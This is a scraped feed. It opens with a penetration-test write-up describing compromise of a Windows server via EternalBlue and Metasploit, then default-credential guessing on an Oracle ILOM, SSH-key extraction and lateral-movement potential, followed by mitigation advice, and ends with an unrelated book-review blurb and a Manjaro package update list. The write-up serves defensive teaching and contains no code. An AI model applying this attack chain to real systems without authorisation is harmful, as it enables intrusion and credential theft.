<p><a href="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/06/Attack-Chain.png"><img decoding="async" class="wp-image-284796 size-full aligncenter" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/06/Attack-Chain.png" alt="" width="1250" height="173" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/06/Attack-Chain.png 1250w, https://www.blackhatethicalhacking.com/wp-content/uploads/2025/06/Attack-Chain-980x136.png 980w, https://www.blackhatethicalhacking.com/wp-content/uploads/2025/06/Attack-Chain-480x66.png 480w" sizes="(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) 1250px, 100vw"></a></p>
<p> </p>
<h4><strong>Initial Access via EternalBlue (CVE-2017-0144)</strong>:</h4>
<ul>
<li><span>Our Red Team identified an unpatched Windows 2007 server on the internal network, vulnerable to the EternalBlue exploit, a renowned vulnerability in the Server Message Block (SMB) protocol.</span></li>
<li>EternalBlue, which exploits a flaw in how Windows handles SMBv1 requests, allowed us to execute arbitrary code remotely. This access provided an initial foothold on the network, enabling us to pivot further and assess the surrounding assets.</li>
<li>Using post-exploitation frameworks, we mapped the network from this compromised server, enumerating connected devices, including an Oracle ILOM server.</li>
</ul>
<p> </p>
<h4><strong>Discovery of the Oracle ILOM Server and Credential Strategy</strong>:</h4>
<ul>
<li>The Oracle ILOM server presented itself as an accessible management interface but was secured only by default credentials. This issue, while not tied to a specific CVE, is a well-documented vulnerability in Oracle ILOM systems. It was done through fuzzing using a dictionary that contained default and predictable credential.</li>
<li>Recognizing the potential, we conducted a series of targeted research on Oracle’s default credential documentation. A quick test confirmed that the server’s interface was still configured with the factory-default credentials.</li>
<li>Upon logging in, we gained administrative control over the server, allowing us to view sensitive configuration files, extract SSH keys, and access network configurations.</li>
</ul>
<p> </p>
<h4><strong>Complete Control via ILOM Features</strong>:</h4>
<ul>
<li>With administrative access, we could leverage the KVMS (Keyboard, Video, Mouse, Storage) capabilities of the Oracle ILOM interface, which grants extensive control over the hardware remotely.</li>
<li>We also discovered options for shutting down or resetting the server, which could disrupt services at will.</li>
<li>Additionally, access to SSH keys and network data provided in configuration files could allow an attacker to authenticate on other parts of the network, facilitating a broader campaign of infiltration and potential data exfiltration.</li>
</ul>
<p> </p>
<p>This multi-step exploitation demonstrated not only the potential damage of unpatched vulnerabilities like EternalBlue but also the impact of poor security posture, such as default credentials on sensitive management systems. Each step required a manual, creative approach that exemplifies the need for comprehensive security reviews, especially on legacy systems.</p>
<p> </p>
<h2 class="post_title"><strong>Screenshots</strong></h2>
<p><a href="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/06/Oracle_Server_SSH_Stealing_Keys.png"><img decoding="async" class="wp-image-284817  aligncenter" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/06/Oracle_Server_SSH_Stealing_Keys.png" alt="" width="805" height="434"></a></p>
<p><span><em>Oracle_Server_SSH_Stealing_Keys</em></span></p>
<p> </p>
<p>The above image illustrates the extraction of unencrypted SSH keys from the ILOM’s configuration files, which could be used for lateral movement within the network.</p>
<p> </p>
<p><a href="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/06/Oracle_Server_ILOM_Default_PW_From_Manual.png"><img decoding="async" class="aligncenter wp-image-284818" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/06/Oracle_Server_ILOM_Default_PW_From_Manual.png" alt="" width="805" height="405"></a></p>
<p><span><em>Oracle_Server_ILOM_Default_PW_From_Manual </em></span></p>
<p> </p>
<p>The above image is from Oracle documentation showing default password information, corroborating the method used to gain access.</p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_100  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p> <!-- Articles_Horizontal_smaller --> <ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="4873481366"></ins> </p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_101 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>See Also: <a href="https://www.blackhatethicalhacking.com/articles/post-exploitation-techniques-maintaining-access-escalating-privileges-gathering-credentials-covering-tracks/">Post-Exploitation Techniques: Maintaining Access, Escalating Privileges, Gathering Credentials, Covering Tracks</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_102  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h2 class="post_title"><strong>Recommendations</strong></h2>
<p>To mitigate the risks and prevent unauthorized access to Oracle ILOM systems and other critical infrastructure, the following security measures are recommended:</p>
<ol>
<li><strong>Patch and Monitor Legacy Systems</strong>:
<ul>
<li>Ensure that all legacy systems are patched against vulnerabilities like EternalBlue (CVE-2017-0144). For environments with strict uptime requirements, consider network segmentation to protect unpatched legacy systems from external threats.</li>
</ul>
</li>
<li><strong>Change Default Credentials on Management Interfaces</strong>:
<ul>
<li>Oracle ILOM systems, along with other management consoles, should be reconfigured with unique, strong passwords immediately upon deployment. Organizations should conduct regular audits to identify and secure systems that may still use default credentials.</li>
</ul>
</li>
<li><strong>Upgrade Oracle ILOM Firmware</strong>:
<ul>
<li>Upgrade all Oracle ILOM servers to the latest version of the firmware, which often includes fixes for default credential vulnerabilities and other security improvements. Keeping firmware up-to-date is essential for protecting these devices from well-known exploits.</li>
</ul>
</li>
<li><strong>Implement Strong Access Controls and Monitoring</strong>:
<ul>
<li>Configure management interfaces like Oracle ILOM to restrict access to trusted IP ranges and authorized personnel only. Enable logging and monitoring to detect unusual access patterns that may indicate unauthorized attempts.</li>
</ul>
</li>
<li><strong>Network Segmentation</strong>:
<ul>
<li>Critical management interfaces, such as Oracle ILOM, should be segregated from the primary production network and placed in isolated network segments. This will prevent attackers from using a compromised management interface as a pivot point for further internal attacks.</li>
</ul>
</li>
</ol>
<p> </p>
<p>By addressing these vulnerabilities proactively, organizations can greatly reduce their exposure to similar multi-layered attacks and secure sensitive management interfaces.</p>
<p> </p>
<h4><strong>Data Source</strong></h4>
<ul>
<li><strong>Primary Exploitation Method</strong>: Multi-layered manual exploitation using EternalBlue for initial access and default credential reconnaissance.</li>
<li><strong>Supporting Documentation</strong>: Oracle ILOM user <a href="https://docs.oracle.com/cd/E28853_01/index.html">manuals</a> for default credential references, EternalBlue exploitation <a href="https://www.cisecurity.org/insights/white-papers/ms-isac-security-primer-eternal-blue">guides</a>.</li>
<li><strong>Tools used: </strong>Metasploit</li>
</ul>
<p> </p>
<h4><strong>Reference:</strong></h4>
<p><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-0144">CVE-2017-0144:</a> EternalBlue SMB vulnerability in Windows systems: MITRE CVE Details</p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_103  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner">
<p><!-- Articles Adsense Adcode --><ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="3193330934" data-ad-format="auto" data-full-width-responsive="true"></ins> </p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_104 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>See Also: <a href="https://www.blackhatethicalhacking.com/articles/the-difference-between-internal-and-external-pentesting/">The Difference between Internal and External Pentesting</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_105  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h2><strong>Lessons for the Defence Team</strong></h2>
<p>This case highlights the critical role of manual penetration testing in uncovering complex vulnerabilities that automated tools often fail to detect. The exploitation chain involving EternalBlue and Oracle ILOM’s default credentials demonstrates how attackers can combine legacy vulnerabilities with poor security hygiene to achieve administrative control over critical infrastructure. Automated tools will not know where to look and what to test, it does it in a ‘Hail Mary’ fashion, hence why manual Pentesting can be more creative when hunting down a specific attack vector.</p>
<p>Patching known vulnerabilities, such as those exploited in this case, and securing administrative interfaces are foundational practices for robust cyber defense. Additionally, this case underscores the importance of creative and strategic approaches during penetration tests, which are essential for identifying deeply embedded weaknesses in complex environments.</p>
<p>By implementing the recommended mitigations, such as network segmentation, credential hardening, and monitoring, and aligning with globally recognized best-practice frameworks like CIS Controls, organizations can significantly strengthen their resilience against sophisticated attacks. Regular penetration testing ensures that evolving threats are identified and mitigated, safeguarding critical systems while fostering trust and operational continuity.</p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_106 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>See Also: <a href="https://www.blackhatethicalhacking.com/articles/maximizing-idor-detection-with-burp-suites-autorize/">Write up: Maximizing IDOR Detection with Burp Suite’s Autorize</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_107  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p> </p>
<blockquote>
<p>We hope that this write up has taught you something new. If you enjoyed it, the best way that you can support us is to share it! If you’d like to hear more about us, you can find us on <a href="https://www.linkedin.com/company/black-hat-ethical-hacking">LinkedIn</a>, <a href="https://twitter.com/secur1ty1samyth">Twitter</a>, <a href="https://www.youtube.com/channel/UC7-AsunT7zO-ny5-U8glqkw">YouTube</a>.</p>
</blockquote></div>
			</div><div class="et_pb_module et_pb_divider et_pb_divider_11 et_pb_divider_position_ et_pb_space"><div class="et_pb_divider_internal"></div></div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_30 patreon-row">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_30 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_108 premium-content  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h3 class="premium-content">You can find it from our <a href="https://www.patreon.com/blackhatethicalhacking/shop">shop</a> on our Patreon Channel:</h3></div>
			</div><div class="et_pb_module et_pb_image et_pb_image_8">
				
				
				
				
				<a href="https://www.patreon.com/blackhatethicalhacking/shop/hacking-with-armitage-metasploit-100631" target="_blank"><span class="et_pb_image_wrap "><img decoding="async" width="800" height="120" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2024/02/Hacking-with-Armitage.png" alt="Patreon" title="Hacking with Armitage" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2024/02/Hacking-with-Armitage.png 800w, https://www.blackhatethicalhacking.com/wp-content/uploads/2024/02/Hacking-with-Armitage-480x72.png 480w" sizes="(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 800px, 100vw" class="wp-image-277902"></span></a>
			</div>
			</div>
				
				
				
				
			</div>
			</div><div class="et_pb_column et_pb_column_1_4 et_pb_column_11    et_pb_css_mix_blend_mode_passthrough">
				
				
				
				
				<div class="et_pb_module et_pb_sidebar_10 news-sidebar1 et_pb_widget_area clearfix et_pb_widget_area_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_widget rpwe_widget recent-posts-extended"><h4 class="widgettitle">Recent Articles</h4><div class="rpwe-block news-recent-posts-sb"><ul class="rpwe-ul"><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/articles/unauthorized-ldap-enumeration-exposes-active-directory-for-privilege-escalation/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/06/Oracle-ILOM-Compromise-via-EternalBlue-300x150.webp" alt="Unauthorized LDAP Enumeration Exposes Active Directory for Privilege Escalation" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/articles/unauthorized-ldap-enumeration-exposes-active-directory-for-privilege-escalation/" target="_self">Unauthorized LDAP Enumeration Exposes Active Directory for Privilege Escalation</a></h3><time class="rpwe-time published" datetime="2025-06-23T16:44:35+02:00">June 23, 2025</time></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/articles/using-favicon-for-osint/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/06/Using-Favicon-for-OSINT-300x150.webp" alt="Using Favicon for OSINT" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/articles/using-favicon-for-osint/" target="_self">Using Favicon for OSINT</a></h3><time class="rpwe-time published" datetime="2025-06-19T15:10:45+02:00">June 19, 2025</time></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/articles/red-team-vs-blue-team-mindset-for-better-cybersecurity-defense/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/06/Red-Team-vs-Blue-Team-Mindset-300x150.png" alt="Red Team vs Blue Team Mindset for Better Cybersecurity Defense" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/articles/red-team-vs-blue-team-mindset-for-better-cybersecurity-defense/" target="_self">Red Team vs Blue Team Mindset for Better Cybersecurity Defense</a></h3><time class="rpwe-time published" datetime="2025-06-18T08:44:16+02:00">June 18, 2025</time></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/articles/server-authentication-the-neglected-area-of-adcs/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/06/Server-Authentication_The-neglected-area-of-ADCS-300x150.png" alt="Server Authentication: The neglected area of Active Directory Certificate Services (ADCS)" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/articles/server-authentication-the-neglected-area-of-adcs/" target="_self">Server Authentication: The neglected area of Active Directory Certificate Services (ADCS)</a></h3><time class="rpwe-time published" datetime="2025-06-13T12:43:59+02:00">June 13, 2025</time></li></ul></div><!-- Generated by http://wordpress.org/plugins/recent-posts-widget-extended/ --></div><div class="widget_text et_pb_widget widget_custom_html"><div class="textwidget custom-html-widget">
<!-- Articles Adsense Adcode -->
<ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="3193330934" data-ad-format="auto" data-full-width-responsive="true"></ins>
</div></div>
			</div><div class="et_pb_module et_pb_sidebar_11 news-sidebar2 et_pb_widget_area clearfix et_pb_widget_area_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_widget widget_block"><a href="https://www.blackhatethicalhacking.com/courses/"><img decoding="async" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2022/06/OffSec-Course.png"></a>
<h3>Offensive Security &amp; Ethical Hacking Course</h3>
<p>Begin the learning curve of hacking now!</p></div><div class="et_pb_widget widget_block"><hr>
<a href="https://www.blackhatethicalhacking.com/solutions/"><img decoding="async" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Solutions.png"></a>
<h3>Information Security Solutions</h3>
<p>Find out how Pentesting Services can help you.</p></div><div class="et_pb_widget widget_block"><hr>
<a href="https://discord.gg/EYMqveWXkv"><img decoding="async" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/10/Discord.png"></a>
<h3>Join our Community</h3></div>
			</div>
			</div>
				</div>
				
			</div>The post <a href="https://www.blackhatethicalhacking.com/articles/post-exploitation-of-oracle-ilom-server-via-eternal-blue/">Post-Exploitation of Oracle ILOM Server via Eternal Blue</a> first appeared on <a href="https://www.blackhatethicalhacking.com/">Black Hat Ethical Hacking</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[Review: Metasploit, 2nd Edition]]></title>
<description><![CDATA[If you’ve spent any time in penetration testing, chances are you’ve crossed paths with Metasploit. The second edition of Metasploit tries to bring the book in line with how pentesters are using the tool. It mostly succeeds, with some caveats depending on your experience level and what you’re hopi...]]></description>
<link>https://tsecurity.de/de/2809761/it-security-nachrichten/review-metasploit-2nd-edition/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2809761/it-security-nachrichten/review-metasploit-2nd-edition/</guid>
<pubDate>Mon, 02 Jun 2025 07:19:02 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>If you’ve spent any time in penetration testing, chances are you’ve crossed paths with Metasploit. The second edition of Metasploit tries to bring the book in line with how pentesters are using the tool. It mostly succeeds, with some caveats depending on your experience level and what you’re hoping to get out of it. About the authors David Kennedy, founder of Binary Defense and TrustedSec, is a cybersecurity leader who advised on the series Mr. … <a href="https://www.helpnetsecurity.com/2025/06/02/review-metasploit-2nd-edition/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2025/06/02/review-metasploit-2nd-edition/">Review: Metasploit, 2nd Edition</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Testing Update] 2025-05-17 - Kernel 6.15-rc6, Gitlab, Thunderbird]]></title>
<description><![CDATA[Hello community, here we have another set of package updates. After coming back to Europe from Asia I’m about to move to a new apartment at the country side. Therefore I might be less responsive on the forum. So lets test these packages thoroughly so we can do another stable branch snap.
Current ...]]></description>
<link>https://tsecurity.de/de/2781584/unix-server/testing-update-2025-05-17-kernel-615-rc6-gitlab-thunderbird/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2781584/unix-server/testing-update-2025-05-17-kernel-615-rc6-gitlab-thunderbird/</guid>
<pubDate>Sat, 17 May 2025 09:18:19 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-theme-toc="true"> </div>
<p>Hello community, here we have another set of package updates. After coming back to Europe from Asia I’m about to move to a new apartment at the country side. Therefore I might be less responsive on the forum. So lets test these packages thoroughly so we can do another <strong>stable</strong> branch snap.</p>
<h3><a name="p-777406-current-promotions-1" class="anchor" href="https://forum.manjaro.org/#p-777406-current-promotions-1"></a>Current Promotions</h3>
<ul>
<li>Find out all about our current <strong>Gaming Laptop</strong> the <a href="https://hero.manjaro.org/">Hero</a> with Manjaro pre-installed from Spain!</li>
<li>Protect your personal data, keep yourself safe with Surfshark VPN: <a href="https://get.surfshark.net/aff_c?offer_id=6&amp;aff_id=14558-">See current promotion</a></li>
</ul>
<h2><a name="p-777406-recent-news-2" class="anchor" href="https://forum.manjaro.org/#p-777406-recent-news-2"></a>Recent News</h2>
<ul>
<li><a href="https://forum.manjaro.org/t/manjaro-25-0-zetar-released/177008" class="inline-onebox">Manjaro 25.0 Zetar released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-summit-public-alpha-now-available/176995" class="inline-onebox">Manjaro Summit public Alpha now available</a></li>
<li>As of Linux 6.13.12, the 6.13 series is now EOL (End Of Life). Please install 6.14 stable and/or 6.12 LTS (Long Term Support).</li>
</ul>

Valkey to replace Redis in the [extra] Repository <a href="https://forum.manjaro.org/t/testing-update-2025-05-17-kernel-6-15-rc6-gitlab-thunderbird/178044/1">(click for more details)</a>

Previous News
Finding information easier about Manjaro <a href="https://forum.manjaro.org/t/testing-update-2025-05-17-kernel-6-15-rc6-gitlab-thunderbird/178044/1">(click for more details)</a>
<h2><a name="p-777406-notable-package-updates-3" class="anchor" href="https://forum.manjaro.org/#p-777406-notable-package-updates-3"></a>Notable Package Updates</h2>
<ul>
<li><strong>Kernel</strong> <a href="https://lore.kernel.org/lkml/CAHk-=wgkt+h_UJKE7Lx=b=ixt=ryZ_fXRqMjJYURYVK-3g-k+g@mail.gmail.com/T/#u">6.15-rc6</a></li>
<li><strong>Thunderbird</strong> <a href="https://www.thunderbird.net/en-US/thunderbird/138.0.1/releasenotes/">138.0.1</a></li>
<li><strong>Gitlab</strong> <a href="https://about.gitlab.com/releases/2025/05/15/gitlab-18-0-released/">18.0.0</a></li>
</ul>
<h2><a name="p-777406-additional-info-4" class="anchor" href="https://forum.manjaro.org/#p-777406-additional-info-4"></a>Additional Info</h2>

Python 3.13 info <a href="https://forum.manjaro.org/t/testing-update-2025-05-17-kernel-6-15-rc6-gitlab-thunderbird/178044/1">(click for more details)</a>

Info about AUR packages <a href="https://forum.manjaro.org/t/testing-update-2025-05-17-kernel-6-15-rc6-gitlab-thunderbird/178044/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<h2><a name="p-777406-our-current-supported-kernels-5" class="anchor" href="https://forum.manjaro.org/#p-777406-our-current-supported-kernels-5"></a>Our current supported kernels</h2>
<ul>
<li>linux54 5.4.293</li>
<li>linux510 5.10.237</li>
<li>linux515 5.15.182</li>
<li>linux61 6.1.138</li>
<li>linux66 6.6.90</li>
<li>linux612 6.12.28</li>
<li>linux613 6.13.12 [EOL]</li>
<li>linux614 6.14.6</li>
<li>linux615 6.15-rc6</li>
<li>linux61-rt 6.1.134_rt51</li>
<li>linux66-rt 6.6.87_rt54</li>
<li>linux612-rt 6.12.16_rt9</li>
<li>linux613-rt 6.13_rt5</li>
<li>linux614-rt 6.14.0_rt3</li>
</ul>
<p><strong>Package Changes</strong> (Sat May 17 08:08:55 CEST 2025)</p>
<ul>
<li>testing core x86_64:  3 new and 3 removed package(s)</li>
<li>testing extra x86_64:  265 new and 330 removed package(s)</li>
<li>testing multilib x86_64:  2 new and 2 removed package(s)</li>
</ul>
<pre><code class="lang-auto">:: Different overlay package(s) in repository core x86_64

-------------------------------------------------------------------------------
                             PACKAGE             20250515             20250517
-------------------------------------------------------------------------------
                            linux615          6.15.0rc5-1          6.15.0rc6-1
                    linux615-headers          6.15.0rc5-1          6.15.0rc6-1


:: Different sync package(s) in repository core x86_64

-------------------------------------------------------------------------------
                             PACKAGE             20250515             20250517
-------------------------------------------------------------------------------
                              json-c               0.18-1               0.18-2


:: Different overlay package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE             20250515             20250517
-------------------------------------------------------------------------------
                            chromium     136.0.7103.113-1                    -
                  linux615-acpi_call            1.2.2-0.8            1.2.2-0.9
                   linux615-bbswitch              0.8-0.8              0.8-0.9
               linux615-nvidia-470xx       470.256.02-0.7                    -
                      linux615-r8168         8.055.00-0.8         8.055.00-0.9
                   linux615-tp_smapi             0.44-0.1             0.44-0.2
                linux615-vhba-module         20250329-0.8         20250329-0.9
                    one-launcher-git            0.1.0-0.6           0.1.0-0.13
                         thunderbird            138.0.1-1                    -
                 thunderbird-i18n-af            138.0.1-1                    -
                 thunderbird-i18n-ar            138.0.1-1                    -
                thunderbird-i18n-ast            138.0.1-1                    -
                 thunderbird-i18n-be            138.0.1-1                    -
                 thunderbird-i18n-bg            138.0.1-1                    -
                 thunderbird-i18n-br            138.0.1-1                    -
                 thunderbird-i18n-ca            138.0.1-1                    -
                thunderbird-i18n-cak            138.0.1-1                    -
                 thunderbird-i18n-cs            138.0.1-1                    -
                 thunderbird-i18n-cy            138.0.1-1                    -
                 thunderbird-i18n-da            138.0.1-1                    -
                 thunderbird-i18n-de            138.0.1-1                    -
                thunderbird-i18n-dsb            138.0.1-1                    -
                 thunderbird-i18n-el            138.0.1-1                    -
              thunderbird-i18n-en-gb            138.0.1-1                    -
              thunderbird-i18n-en-us            138.0.1-1                    -
              thunderbird-i18n-es-ar            138.0.1-1                    -
              thunderbird-i18n-es-es            138.0.1-1                    -
                 thunderbird-i18n-et            138.0.1-1                    -
                 thunderbird-i18n-eu            138.0.1-1                    -
                 thunderbird-i18n-fi            138.0.1-1                    -
                 thunderbird-i18n-fr            138.0.1-1                    -
              thunderbird-i18n-fy-nl            138.0.1-1                    -
              thunderbird-i18n-ga-ie            138.0.1-1                    -
                 thunderbird-i18n-gd            138.0.1-1                    -
                 thunderbird-i18n-gl            138.0.1-1                    -
                 thunderbird-i18n-he            138.0.1-1                    -
                 thunderbird-i18n-hr            138.0.1-1                    -
                thunderbird-i18n-hsb            138.0.1-1                    -
                 thunderbird-i18n-hu            138.0.1-1                    -
              thunderbird-i18n-hy-am            138.0.1-1                    -
                 thunderbird-i18n-id            138.0.1-1                    -
                 thunderbird-i18n-is            138.0.1-1                    -
                 thunderbird-i18n-it            138.0.1-1                    -
                 thunderbird-i18n-ja            138.0.1-1                    -
                 thunderbird-i18n-ka            138.0.1-1                    -
                thunderbird-i18n-kab            138.0.1-1                    -
                 thunderbird-i18n-kk            138.0.1-1                    -
                 thunderbird-i18n-ko            138.0.1-1                    -
                 thunderbird-i18n-lt            138.0.1-1                    -
                 thunderbird-i18n-ms            138.0.1-1                    -
              thunderbird-i18n-nb-no            138.0.1-1                    -
                 thunderbird-i18n-nl            138.0.1-1                    -
              thunderbird-i18n-nn-no            138.0.1-1                    -
              thunderbird-i18n-pa-in            138.0.1-1                    -
                 thunderbird-i18n-pl            138.0.1-1                    -
              thunderbird-i18n-pt-br            138.0.1-1                    -
              thunderbird-i18n-pt-pt            138.0.1-1                    -
                 thunderbird-i18n-rm            138.0.1-1                    -
                 thunderbird-i18n-ro            138.0.1-1                    -
                 thunderbird-i18n-ru            138.0.1-1                    -
                 thunderbird-i18n-sk            138.0.1-1                    -
                 thunderbird-i18n-sl            138.0.1-1                    -
                 thunderbird-i18n-sq            138.0.1-1                    -
                 thunderbird-i18n-sr            138.0.1-1                    -
              thunderbird-i18n-sv-se            138.0.1-1                    -
                 thunderbird-i18n-th            138.0.1-1                    -
                 thunderbird-i18n-tr            138.0.1-1                    -
                 thunderbird-i18n-uk            138.0.1-1                    -
                 thunderbird-i18n-uz            138.0.1-1                    -
                 thunderbird-i18n-vi            138.0.1-1                    -
              thunderbird-i18n-zh-cn            138.0.1-1                    -
              thunderbird-i18n-zh-tw            138.0.1-1                    -
                 tuxedo-drivers-dkms             4.13.0-1             4.13.1-1


:: Different sync package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE             20250515             20250517
-------------------------------------------------------------------------------
                             avr-gcc             14.2.0-1             15.1.0-1
                             baresip             3.21.0-2             3.22.0-1
                           bitwarden           2025.2.1-1           2025.4.2-1
                               broot             1.46.3-1             1.46.4-1
                      cargo-binstall             1.12.4-1             1.12.5-1
                       cargo-nextest             0.9.95-1             0.9.96-1
                            chromium      136.0.7103.92-1     136.0.7103.113-1
                                code            1.100.1-1            1.100.2-1
                                  d2              0.6.9-1              0.7.0-1
                         dark-reader            4.9.105-1            4.9.106-1
                               doctl            1.126.0-1            1.127.0-1
                                dolt           1:1.53.3-1           1:1.53.5-1
                          electron34             34.5.5-1             34.5.6-1
                          electron35             35.3.0-1             35.4.0-1
                          electron36             36.2.0-1             36.2.1-1
                          emscripten              4.0.4-1              4.0.8-1
                 firefox-dark-reader            4.9.105-1            4.9.106-1
           firefox-developer-edition            139.0b8-1            139.0b9-1
  firefox-developer-edition-i18n-ach            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-af            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-an            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-ar            139.0b8-1            139.0b9-1
  firefox-developer-edition-i18n-ast            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-az            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-be            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-bg            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-bn            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-br            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-bs            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-ca            139.0b8-1            139.0b9-1
firefox-developer-edition-i18n-ca-valencia      139.0b8-1            139.0b9-1
  firefox-developer-edition-i18n-cak            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-cs            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-cy            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-da            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-de            139.0b8-1            139.0b9-1
  firefox-developer-edition-i18n-dsb            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-el            139.0b8-1            139.0b9-1
firefox-developer-edition-i18n-en-ca            139.0b8-1            139.0b9-1
firefox-developer-edition-i18n-en-gb            139.0b8-1            139.0b9-1
firefox-developer-edition-i18n-en-us            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-eo            139.0b8-1            139.0b9-1
firefox-developer-edition-i18n-es-ar            139.0b8-1            139.0b9-1
firefox-developer-edition-i18n-es-cl            139.0b8-1            139.0b9-1
firefox-developer-edition-i18n-es-es            139.0b8-1            139.0b9-1
firefox-developer-edition-i18n-es-mx            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-et            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-eu            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-fa            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-ff            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-fi            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-fr            139.0b8-1            139.0b9-1
  firefox-developer-edition-i18n-fur            139.0b8-1            139.0b9-1
firefox-developer-edition-i18n-fy-nl            139.0b8-1            139.0b9-1
firefox-developer-edition-i18n-ga-ie            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-gd            139.0b8-1            139.0b9-1
